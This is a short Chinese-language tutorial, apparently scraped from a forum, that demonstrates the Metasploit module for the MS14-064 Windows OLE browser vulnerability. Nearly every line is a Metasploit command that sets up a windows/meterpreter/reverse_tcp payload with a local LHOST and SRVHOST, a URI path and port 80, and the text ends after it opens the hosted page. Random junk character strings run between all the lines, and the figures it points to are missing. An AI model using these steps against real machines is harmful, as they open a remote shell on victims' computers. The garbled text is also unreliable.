% f/ A2 x( k3 ]! l1 A
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
' ^/ s9 G$ g) ]5 Y6 L: ^: `
# ~! e7 n# D, M! q! b. w' L9 M. o. s. M9 Y' ?" V
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
+ Y3 i0 U1 T) N" q( W
* a5 c- u" l( A) e& E% x; Y; ?. ?
1 A7 p; u4 w& ^3 B% h 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ q4 \9 ^3 Y# T
' B/ G) ^4 _% O7 D
& R! b& S+ h5 D. e3 i1 F set AllowPowershellPrompt true9 h5 N8 t( ^1 k
: m6 b; G) J& m- m
; S8 [5 {- v1 J Set LHOST 192.168.0.109
9 I) \, n" M* j' }3 @! ]; D
. v" ^( O: g4 B b; p2 S7 A
9 _ d+ S# f% @ set SRVHOST 192.168.0.109' C# f& F% g, a1 {( N! i, D
- a+ x/ \8 W+ l; ^) U: _
+ L" m/ f. a3 W! b, J) L" L Set uripath share" X6 O1 S, I8 H
7 W$ a/ I4 F5 a; Y0 f2 W0 |6 T
( n6 r: d3 N' j0 O4 b
Set srvport 80
) M$ D5 @) o1 {/ F+ _ Z; ?
5 b: x0 z8 }$ x m! e3 ?5 ^4 Z& w& I) y1 {/ V4 n C
0 }& U* U8 H, O2 D( Z: [. j q
+ p& U* ^1 s$ m( e6 G3 t- J
! z: ^5 t+ g( ^1 }0 z# v4 h 1 w" \; @9 A* p4 c
1 U# ?+ x2 `3 b$ ~% v; u) p* `, ~* g S
6 }# Y0 f$ g1 ~3 A) J* R0 _
9 V: e% {( l* Z! q! X/ u
r: z L3 M" {% B3 O" G+ E# ` 1 A- W {& J4 ~7 Q/ {7 O3 K
8 Y3 y' U, w8 {* G) Q& ~) M' l
: t9 z. o* |3 O' c; o$ }2 K- I 3 e2 C$ z0 G6 r0 M& l: {/ S
- N9 C7 Q2 D, l9 p' }* o1 }, o
- H- [0 c1 | ?: I
下面我们来访问本地地址如图:- T5 _% ]. j1 S, z8 ^
( v I6 ^% L) A% [! g# g
& i$ w+ e+ |# z2 @% Y " v6 `1 U8 g' i; p4 e: v* U
- N$ E( _8 o6 Q, D3 K1 x
; z: u+ t6 E9 e9 i- }
+ I* m5 b3 N/ u$ d- y& f* s7 z
0 Q' ~2 A" y3 h0 y
: D2 z9 P9 D) d1 X
/ \- {" S; X: A# W$ @- y1 U9 i